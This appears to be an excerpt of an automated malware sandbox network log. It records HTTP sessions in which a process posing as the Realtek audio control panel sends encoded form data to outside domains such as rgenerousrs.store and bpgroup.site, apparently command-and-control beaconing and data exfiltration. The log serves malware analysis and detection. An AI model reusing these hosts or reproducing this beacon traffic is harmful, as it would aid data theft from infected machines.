                                                                            Dec 3, 2024 18:57:42.872900963 CET1289INData Raw: 1b 28 08 bd 08 a3 0d 0a a8 af 2a 4a d1 f7 91 5d 68 8e 31 d6 97 0c 9b 35 b0 68 14 7b 33 61 39 85 0c 53 41 7d 86 7c 9b af a1 83 18 fd b1 9c a9 3b f7 ea aa 90 55 7f 76 7b 7e bb 76 41 4b 3c 7d 32 7a 79 2a 05 fe 34 70 93 e8 74 70 34 18 4c fb d8 14 25
                                                                            Data Ascii: (*J]h15h{3a9SA}|;Uv{~vAK<}2zy*4ptp4L%D~APOkv1pi}sQywPuVw3L*I(e`?2mJ_ZQs=%!#LiBfmMaY4\.}j*RyF
                                                                            Dec 3, 2024 18:57:42.872937918 CET473INData Raw: 3a ba e5 fc c6 af d9 cf 79 4a 1d 27 ad c0 97 71 03 f8 12 8b 19 38 4f 83 9d ed 37 f9 58 47 7b 2b a0 65 fc aa 09 ed 57 de 15 18 9b e9 a1 8e ee 56 40 c9 b8 01 28 01 0c d2 b7 1c f8 73 c0 92 7b f2 98 4b ee 49 5b 4b 6e e2 0b 11 d9 dc 7b 88 13 f1 73 68
                                                                            Data Ascii: :yJ'q8O7XG{+eWV@(s{KI[Kn{shV@Fd.e;I1iFL8hFLT$a~kHqL^T<0&!,@jkLp-$a>d?k$2yXDpC\


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            44192.168.11.2049793172.67.187.114807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:44.470689058 CET487OUTGET /swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.zkdamdjj.shop
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:45.448976994 CET1272INHTTP/1.1 301 Moved Permanently
                                                                            Date: Tue, 03 Dec 2024 17:57:45 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-redirect-by: WordPress
                                                                            location: https://zkdamdjj.shop/swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xs
                                                                            x-litespeed-cache-control: public,max-age=3600
                                                                            x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.9b9a69d1fac6b11918e507384a598f21,02a_
                                                                            x-litespeed-cache: miss
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7LCKfwXYIFJRAs1oUloK7hJkRUhQiQPV7oWV7qZcoaTsuw%2BHLeb99T9AdivxJpWUoEVFS%2B8LQsDsnfTxJxnSrtptyR5BW8C3oIZ8vJIqup%2BdFAssBZS0llLDLq7ZbIbHk1RXlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec570d95cd95c67-MIA
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126953&min_rtt=126953&rtt_var=63476&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            45192.168.11.2049794104.21.57.248807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:50.758130074 CET770OUTPOST /8gp4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/8gp4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 49 47 32 35 56 54 46 35 52 72 45 44 67 52 4d 2f 37 79 53 54 38 2b 49 37 67 35 48 68 56 4f 68 4c 79 62 38 45 31 2b 77 52 59 51 42 7a 2b 44 59 41 4d 76 65 77 71 32 6f 48 78 34 38 4a 67 73 46 48 49 36 4f 6b 30 37 72 69 50 69 6b 57 70 33 65 54 39 4b 65 38 48 6c 76 55 4f 6e 70 71 78 52 78 65 45 4c 44 58 34 30 56 6d 41 7a 63 4f 61 65 2b 65 66 6a 46 57 67 38 53 79 66 6b 42 35 39 57 59 6e 54 70 71 47 4d 44 63 48 39 41 68 77 62 74 57 65 71 61 76 79 35 42 35 42 78 2f 74 74 5a 36 35 53 33 35 35 73 34 4a 53 70 54 73 4c 6c 38 68 44 6d 34 38 77 55 33 6e 55 52 4c 51 34 49 59 34 4b 41 53 77 3d 3d
                                                                            Data Ascii: 2O=IG25VTF5RrEDgRM/7yST8+I7g5HhVOhLyb8E1+wRYQBz+DYAMvewq2oHx48JgsFHI6Ok07riPikWp3eT9Ke8HlvUOnpqxRxeELDX40VmAzcOae+efjFWg8SyfkB59WYnTpqGMDcH9AhwbtWeqavy5B5Bx/ttZ65S355s4JSpTsLl8hDm48wU3nURLQ4IY4KASw==
                                                                            Dec 3, 2024 18:57:51.285345078 CET1082INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:51 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EoCW232EuO0Bk0uqaGzxdC211O969fmJhDI5v4KRKVQEdGzhoj3KmWqjsu0RGRBsfVB%2BKNubf9p20R00Q9gE3FZwYLtyX1jSh8bQZUR3HT2NqeYVTRQ%2BH6SCwy7aHzZjFO3hmngqPQU%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec571009b465c6b-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126450&min_rtt=126450&rtt_var=63225&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a
                                                                            Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8
                                                                            Dec 3, 2024 18:57:51.285422087 CET16INData Raw: 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                            Data Ascii: b*
                                                                            Dec 3, 2024 18:57:51.285510063 CET5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            46192.168.11.2049795104.21.57.248807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:53.404745102 CET790OUTPOST /8gp4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/8gp4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 49 47 32 35 56 54 46 35 52 72 45 44 68 78 38 2f 33 79 75 54 36 65 49 34 76 5a 48 68 63 75 68 50 79 62 77 45 31 2f 46 61 5a 69 56 7a 2b 6d 6b 41 64 62 79 77 74 32 6f 48 70 49 38 49 2b 63 46 36 49 36 44 62 30 37 6e 69 50 69 77 57 70 79 61 54 39 38 57 2f 47 31 76 53 46 48 70 30 73 68 78 65 45 4c 44 58 34 30 52 41 41 7a 30 4f 5a 76 4f 65 63 42 74 56 38 73 53 39 50 55 42 35 35 57 59 5a 54 70 71 77 4d 43 42 61 39 43 5a 77 62 73 6d 65 71 4c 76 7a 7a 42 35 48 31 2f 73 48 66 50 55 2b 38 62 52 66 35 70 75 70 65 39 7a 47 35 33 4f 38 6c 4f 45 77 30 30 49 6a 50 67 42 67 61 36 4c 62 50 39 54 52 6a 4f 32 72 66 45 67 6e 79 6c 42 6c 30 75 66 65 42 33 38 3d
                                                                            Data Ascii: 2O=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiVz+mkAdbywt2oHpI8I+cF6I6Db07niPiwWpyaT98W/G1vSFHp0shxeELDX40RAAz0OZvOecBtV8sS9PUB55WYZTpqwMCBa9CZwbsmeqLvzzB5H1/sHfPU+8bRf5pupe9zG53O8lOEw00IjPgBga6LbP9TRjO2rfEgnylBl0ufeB38=
                                                                            Dec 3, 2024 18:57:53.924298048 CET1086INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:53 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFp%2Fh0lJmMUcCwHLUbIN28YRo%2BNEfPQbqXL%2B9vHhWK9a38RvMguNmfe4gZ3qos%2BbwscuFYZoLz17DcGZYhXuSwyoZMV08BpcBi3uzOSm5oDyMEysOM9PeH7Mj99AYTkOfQALQ2oeoQk%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec571112a6c9ab4-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126055&min_rtt=126055&rtt_var=63027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a
                                                                            Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8
                                                                            Dec 3, 2024 18:57:53.924343109 CET16INData Raw: 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                            Data Ascii: b*
                                                                            Dec 3, 2024 18:57:53.924376965 CET5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            47192.168.11.2049796104.21.57.248807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:56.060842991 CET1289OUTPOST /8gp4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/8gp4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 49 47 32 35 56 54 46 35 52 72 45 44 68 78 38 2f 33 79 75 54 36 65 49 34 76 5a 48 68 63 75 68 50 79 62 77 45 31 2f 46 61 5a 69 4e 7a 2b 51 77 41 50 4b 79 77 73 32 6f 48 33 34 38 4e 2b 63 46 72 49 2b 76 66 30 37 36 58 50 67 49 57 34 6b 6d 54 74 4a 32 2f 4d 31 76 53 4b 6e 70 31 78 52 77 63 45 4b 7a 54 34 30 42 41 41 7a 30 4f 5a 74 47 65 4c 44 46 56 76 63 53 79 66 6b 42 31 39 57 59 69 54 70 79 67 4d 43 55 74 68 69 35 77 59 4d 32 65 76 35 33 7a 37 42 35 46 79 2f 73 66 66 50 51 68 38 61 39 39 35 6f 71 48 65 2b 44 47 35 47 79 72 2b 4e 6f 6f 33 30 78 70 4f 52 31 46 62 4b 48 52 50 4f 48 32 69 6f 36 46 5a 67 45 6f 37 32 56 6b 6d 4c 44 2b 44 41 4f 62 4d 74 6b 48 30 71 6e 50 68 4c 32 78 43 6b 43 61 30 6f 47 64 6b 70 64 69 46 37 75 33 48 4f 35 6c 49 78 4f 79 78 73 32 70 63 77 78 48 55 72 67 32 6c 73 34 71 6f 74 61 65 30 45 59 71 42 77 43 6a 30 31 7a 43 65 2b 63 32 75 66 61 77 6a 63 56 38 65 55 52 48 4b 41 4f 54 4b 43 50 6a 4d 38 72 66 53 61 45 78 68 55 73 78 48 61 2b 70 78 32 70 34 77 42 79 69 2b 69 6f [TRUNCATED]
                                                                            Data Ascii: 2O=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiNz+QwAPKyws2oH348N+cFrI+vf076XPgIW4kmTtJ2/M1vSKnp1xRwcEKzT40BAAz0OZtGeLDFVvcSyfkB19WYiTpygMCUthi5wYM2ev53z7B5Fy/sffPQh8a995oqHe+DG5Gyr+Noo30xpOR1FbKHRPOH2io6FZgEo72VkmLD+DAObMtkH0qnPhL2xCkCa0oGdkpdiF7u3HO5lIxOyxs2pcwxHUrg2ls4qotae0EYqBwCj01zCe+c2ufawjcV8eURHKAOTKCPjM8rfSaExhUsxHa+px2p4wByi+io06KxyJ0l0ZfX6fVos4z0C+9lTwUl4Lwbr77/ds84ffg7YlETMJW9ZqnUhfrPOoHATm60VH8kbq/plV/0V6/oSEdUieim88XbrEcE6KVHSmOGij6kVqsK81ULrMoI6E6vIjFr2e12TfTZCvck7QUqAFDQcPgD/tvWS8dostxxthitCu+kQrEsseJgwdACPwXbUeqHEZ+/0W8nuiUTxIXZ+O7oYdAovl7XnwC06z0xMBMb/vHC4ys8B9ZLyNPWwLy8kgAXt5QV+5S8hqk2LUyRnTkhoXGQfer6Y6v2e+1QaeWDHI6XzIMSGAeCFwq4GZHFSHcVZMPdtKVF+5Acd6xJD47hT6i2Ke3VIkfLwjM2sgmWlh1MKkUqIuB7QLz
                                                                            Dec 3, 2024 18:57:56.060902119 CET5156OUTData Raw: 2f 4e 74 30 75 34 4e 4e 55 2f 67 41 2f 6f 55 78 64 2b 6c 32 50 4a 4c 79 45 6e 79 52 53 73 37 6a 50 6b 73 66 78 6a 54 4f 6a 66 38 55 65 79 2f 77 33 63 58 36 6a 35 36 75 31 64 50 44 68 54 4a 41 33 46 6a 48 79 57 68 6a 67 41 6c 61 67 44 4c 62 6a 32
                                                                            Data Ascii: /Nt0u4NNU/gA/oUxd+l2PJLyEnyRSs7jPksfxjTOjf8Uey/w3cX6j56u1dPDhTJA3FjHyWhjgAlagDLbj2Ds96+AMpcBC+0NuhlFWppVVbPdN98YP2xyLxR6Suy2jdzE6uUiuLbg/701+uPIwntrzS7w7n9zr1ktsxMzwoJAXEiobJU6DuLOVHsx2yZIjNLEkZMum8uk3YXTmehsStc5sn64B/DkiDt8EPD/mH/NMG2MWz4USbW
                                                                            Dec 3, 2024 18:57:56.060959101 CET1494OUTData Raw: 4e 71 6c 67 36 78 61 5a 53 37 45 64 32 6d 66 61 58 37 61 4d 54 76 45 49 34 4d 50 48 32 2f 6b 52 62 52 52 67 50 35 36 45 39 32 38 34 67 4d 65 73 6e 74 32 4a 44 50 70 6b 7a 72 30 54 31 64 58 49 69 43 69 51 73 36 34 46 77 4d 33 53 37 44 2b 46 43 31
                                                                            Data Ascii: Nqlg6xaZS7Ed2mfaX7aMTvEI4MPH2/kRbRRgP56E9284gMesnt2JDPpkzr0T1dXIiCiQs64FwM3S7D+FC1w2oxaI6SP/6XiElq+1s9hTBfqaaLD2AGjKZBZNYSYnTF8BHjxgq8RGduYi0s/werovHyvWOUK80Y3cidWJEKF9IHzdFRc2K+C+56ZO4Lr/IhyLwEUmPdlCC9waPr6DlGhUWckVhGA0raRkdKVt1wAT5++AUAvS0q8
                                                                            Dec 3, 2024 18:57:56.613667965 CET1102INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:56 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2F6r0VbfSlBrKDvHw5UcOQmwubrjr7On0EU96h1azsBE00BDqBsuvFJm7MgOxaDvQArDDlBqRA4NAWCIvWUWW%2BmOF%2BzBdvc%2BywGYmPgTKm11Mej%2Fam4pV9gQVEG4%2FDAEhcNDEXa3A9U%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec57121ce4cd9b9-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126193&min_rtt=126193&rtt_var=63096&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7939&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                            Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*
                                                                            Dec 3, 2024 18:57:56.613677979 CET5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            48192.168.11.2049797104.21.57.248807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:58.715545893 CET491OUTGET /8gp4/?ChhG6=J-xs&2O=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.rgenerousrs.store
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:59.220752001 CET1108INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:59 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sVGni9JOIlMPUuWw8s7Klc3Bya8rScV1pDh3A0O089tzEpZKxTnidLz0QgTp9G3yOAo5WpbJkzP6ws0fPkEqIuf55l7NArQ2su3VHV5Y7TXBwCcPYF%2F8ZZeRaJGazlVxIydtsU6FlM%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec571325a157497-MIA
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126725&min_rtt=126725&rtt_var=63362&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
                                                                            Dec 3, 2024 18:57:59.220797062 CET11INData Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 10


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            49192.168.11.204979874.48.143.82807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:04.785938978 CET755OUTPOST /cpit/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.bpgroup.site
                                                                            Origin: http://www.bpgroup.site
                                                                            Referer: http://www.bpgroup.site/cpit/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 68 6f 44 69 42 73 6d 75 6c 79 2f 2f 6b 61 45 4e 51 6a 6e 64 61 65 55 6d 6f 65 63 42 66 71 64 74 77 47 72 74 59 68 70 35 79 33 45 5a 78 48 77 64 4a 52 53 62 30 6b 50 61 77 4e 72 38 65 65 47 48 67 55 49 39 31 4a 58 6f 33 6b 5a 6e 32 48 35 36 6c 42 69 75 38 4e 32 48 76 4a 64 4c 37 6a 78 50 55 66 31 35 34 67 46 43 57 2b 70 57 43 37 30 38 6e 33 71 58 51 63 61 45 39 49 49 73 2f 65 4b 69 54 78 50 61 49 33 2f 42 74 6d 76 30 65 4a 4f 36 6a 5a 34 58 58 34 33 62 4c 32 6c 5a 57 77 39 68 45 49 74 41 43 48 5a 37 59 50 74 36 64 43 4e 4c 44 6c 6f 41 36 76 64 62 46 41 63 6a 41 78 75 6e 30 41 3d 3d
                                                                            Data Ascii: 2O=hoDiBsmuly//kaENQjndaeUmoecBfqdtwGrtYhp5y3EZxHwdJRSb0kPawNr8eeGHgUI91JXo3kZn2H56lBiu8N2HvJdL7jxPUf154gFCW+pWC708n3qXQcaE9IIs/eKiTxPaI3/Btmv0eJO6jZ4XX43bL2lZWw9hEItACHZ7YPt6dCNLDloA6vdbFAcjAxun0A==
